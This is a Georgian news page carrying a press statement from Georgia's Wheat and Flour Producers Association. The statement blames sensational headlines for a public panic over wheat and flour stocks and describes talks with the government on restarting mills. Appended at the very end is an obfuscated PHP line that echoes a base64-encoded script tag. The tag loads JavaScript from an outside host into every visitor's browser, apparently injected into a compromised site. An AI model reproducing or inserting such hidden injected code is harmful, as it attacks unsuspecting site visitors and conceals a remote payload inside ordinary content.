celsiusi
ავერსი საქკაბელი
საქართველოს ხორბლისა და ფქვილის მწარმოებელთა ასოციაცია განცხადებას ავრცელებს, რომელსაც უცვლელად გთავაზობთ: 
 
"პირველ რიგში გვინდა განვაცხადოთ, რომ საქართველოს ხორბლისა და ფქვილის მწარმოებელთა ასოციაცია  მოხარულია, რომ  ფქვილის მარაგების თემასთან დაკავშირებით შექმნილი აჟიოტაჟი, რომელიც გამოწვეული იყო გაუგებრობით, ამოწურულია.
 
ვთვლით, რომ აჟიოტაჟი  გამოწვეული იყო მათ შორის ჩვენგან გასული ინფორმაციის არასწორი ინტერპრეტაციით, რომლებიც სტატიების  სათაურებში იქნა  გამოტანილი. მიუხედავად ამისა, ასოციაცია იღებს  თავის წილ პასუხისმგებლობას და მიაჩნია, რომ მიწოდებული ინფორმაცია უნდა ყოფილიყო უფრო სრული. აქვე გვინდა მივმართოთ პრესის წარმომადგენლებს მეტი პასუხისმგებლობა გამოიჩინონ სათაურების შერჩევისას, რომ იგი სრულად შეესაბამებოდეს ინფორმაციის შინაარსს, რაც ჩვენს შემთხვევაში სამწუხაროდ ვერ მოხერხდა. რამაც სამწუხაროდ დიდ წილად განაპირობა  აღნიშნული აჟიოტაჟი. 
 
ამასთან, გვინდა შედარებით მშვიდ ვითარებაში დავუბრუნდეთ და მოკლედ  გავაანალიზოთ მომხდარი იმისათვის, რომ შემდგომში მსგავსი გაუგებრობებებისაგან საზოგადოებაც და ჩვენც   დაცულები ვიყოთ.
 
აღნიშნულმა კიდევ ერთხელ დაგვანახა, რომ დღეს უაღრესად მნიშვნელოვანია, ჩვენ როგორც რესპოდენტებმა და პრესამ, როგორც ინფორმაციის გამავრცელებლებმა საზოგადოებას მიაწოდოს სწორი და შესაბამისი, მაქსიმალურად ამომწურავი ინფორმაცია.
 
ეს განსაკუთრებით მნიშვნელოვანია, როდესაც საქმე ეხება ისეთი აქტუალურ თემებს, როგორიცაა პურის ფასი, ხორბლისა და ფქვილის მარაგები.
 
კიდევ ერთხელ გვინდა აღვნიშნოთ, რომ ამ კონკრეტულ შემთხვევაში ეს სათანადო დონეზე ვერ მოხერხდა, ამ შემთხვევაში  აღნიშნული პრობლემის ძირითადი მიზეზი იყო სათაურების სენსაციურობა, რომელიც არ შეესაბამებოდა მასალის შინაარსს.
 
ჩვენის აზრით, სათაურებში არ  იყო ასახული და  სრულიად იყო  დაკარგული, ინფორმაციის ერთ ერთი მთავარი ხაზი, ის რომ მიუხედავად ხორბლის მარაგების ამოწურვისა და წისქვილკმბინატების გაჩერებისა ქვეყანაში მოხდა ხორბალის იმპორტის ფქვილის იმპორტით ჩანაცვლება. გვინდა მოვიყვანოთ ერთ ერთი  მაგალითი, რომელიც სენსაციური სათაურიდან გამომდინარე  ყველაზე მეტად სწრაფად ტირაჟირდა მოკლე დროში  დომინოს პრინციპით:
 
„ლევან სილაგავა - საქართველოში ხორბლის მარაგი ამოწურულია და უახლოეს დღეებში ყველა წისქვილი გაჩერდება„ აღნიშნული სათაური ჩვენი ღრმა რწმენით არსებული მხოლოდ ნაწილობრივ ასახავდა შინაარსს და სწორი იქნებოდა, სათაურში წისქვილკმბინატების გაჩერებასა და ხორბლის მარაგების ამოწურვის თემასთან ერთად ყოფილიყო ფქვილის თემა, რომელიც თვითონ მასალაშიც ფიგურირებს და განმარტებულია. ასეთი მაგალითად, ჩვენი აზრით, მასალასთან ადეკვატური  სათაურები შეიძლება ყოფილიყო შემდეგი შინაარსის: 
 
ლევან სილაგავა „თვეებია ფქვილი აგრესიულად შემოდის და ხორბალს ანაცვლებს ამ მიზეზით საქართველოში ხორბლის მარაგი ამოწურულია და უახლოეს დღეებში ყველა წისქვილი გაჩერდება“.
 
ან ლევან სილაგავა - „საქართველოში შემოსატანად ხორბალი შეკვეთილი არაა და შემოდის ფქვილი, აქედან გამომდინარე საქართველოში ხორბლის მარაგი ამოწურულია და უახლოეს დღეებში ყველა წისქვილი გაჩერდება“.
 
ცნობისათვის, ყველა ეს წინადადება--„თვეებია ფქვილი აგრესიულად შემოდის და ხორბალს ანაცვლებს“,„საქართველოში შემოსატანად ხორბალი შეკვეთილი არაა და შემოდის ფქვილი“, აღებულია თვითონ არსებული მასალიდან, შესაბამისად ადვილად შეიძლებოდა მათი სათაურებში ჩასმით მაქსიმალურად ზუსტი შესაბამისობა  ყოფილიყო შინაარსთან მისასალმებელია, რომ ბევრმა საინფორმაციო საშუალებამ თემის აქტუალობიდან გამომდინარე მასალა სწორედ დაბალანსებული და ადეკვატური სათაურით გაუშვა, რაც სრულად ასახავდა წისქვილკომბინატების პრობლემის სიმწვავესაც და ფქვილის შეუფერხებელ იმპორტს  ასე მაგალითად სათაურები:
 
ლევან სილაგავა - „სერიოზულია პრობლემა, რომელიც წისქვილკომბინატების დახურვის შესახებ არსებობს, გვსურს შეხვედრა პრემიერთან“
 
„ხორბლის მარაგი ამოწურულია, მხოლოდ ფქვილი შემოდის, წისქვილები გაჩერდება" შორს ვართ იმ აზრისაგან რომ ვუკარნახოთ ვინმეს რა სათაური შეურჩიონ ინფორმაციას, თუმცა კიდევ ერთხელ ხაზს უსვამთ, რომ ჩვენო აზრით უაღრესად მნიშვნელოვანია  სათაური სრულად ასახავდეს მიწოდებული მასალის შინაარსს.
 
ასოციაცია იმედოვნებს, რომ ეს არ იყო ვინმეს მხრიდან მიზანმიმართული რაიმე აჟოტაჟს გამომწვევი ქმედება, არამედ იყო ბევრი ფაქტორის და პრობლემის ერთად დამთხვევის და გაუგებრობის შედეგი. გვინდა განვაცხადოთ, რომ არსებული სიტუაციიდან გამომდინარე ჩვენი დარგის შესახებ სრული და სანდო ინფორმაციის გავრცელებისათვის მიზნით, ასოციაციამ მიიღო გადაწყვეტილება, რომ ინფორმაციის გასავრცელებლად პრიორიტეტულად გამოიყენებს საკუთარ  რესურს - ოფიციალურ facebook გვერდს, აგრეთვე პირდაპირ ეთერებს და პრეს- კონფერენციებს და სხვა პირდაპირი კომუნიკაციის საშუალებებს, ასოციაცია აღნიშნულ ფორმატებში მზად არის  ნებისმიერ შეკითხვებზე პასუხის გასაცემად ჩვენი კომპეტენციის ფარგლებში.
 
რაც შეეხება სატელევიზიო და სატელეფონო ინფორმაციის გაცემას გვინდა დარწმუნებით ვიცოდეთ, რომ ჩვენი მიწოდებული ინფორმაცია სრულად და ადეკვაატურად იქნება გაგებული და არ მოხდეს ინტერპრეტირება, აქედან გამომდინარე გამოვიყენებთ ინფორმაციის დადასტურების სხვადასხვა მექანიზმს რათა თავიდან ავიცილოთ გაუგებრობები.
 
- და ბოლოს მაღალი საზოგადოებრივი ინტერესიდან გამომდინარე გვსურს საზოგადოებას მივაწოდოთ ინფორმაცია იმის შესახებ, რომ საქართველოს მთავრობასთან, კერძოდ ეკონომიკურ გუნდთან გრძელდება მუშაობა წისქვილკომბინატების მუშობის სწრაფი განახლებისათვის, კონურენტულ გარემოში, როგორც საქართველოში ხორბლის მოსავლის აღების ასევე, სეზონის შემდგომ პერიოდში, ამ მხრივ განიხილება სხვადასხვა მექანიზმები და მათ შორის ერთ – ერთი ვარიანტად ჩვენი ასოციაციის მიერ წარდგენილი გეგმა, რომელიც დამყარებულია საქართველოს წისქვილკომბინატების სრული ამუშავების პარალელურად პურის ფასის შენარჩუნებაზე. წისქვილკომბინატების პასუხისმგებლობაზე ქვეყანაში ხორბლად 2 თვიანი მარაგების არსებობის უზრუნველყოფის მხრივ. აქვე გვინდა აღვნიშნოთ რომ გეგმა არ ითვალისწინებს არავითარი სახსრების მოთხოვნას ბიუჯეტიდან მათ შორის არც სუბსიდირებას, გეგმა ითვალისწინებს მხოლოდ სწორი კონკურენციის პირობებს დაბრუნებას საქართველს ბაზარზე.
 
იმედი გვაქვს მთავრობასთან მოლაპარაკების შედეგად საქართველოს წისქვილკომბინატები უახლოეს დროში შეძლებენ მუშა პროცესის სრულ განახლებას.
 
 
993
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");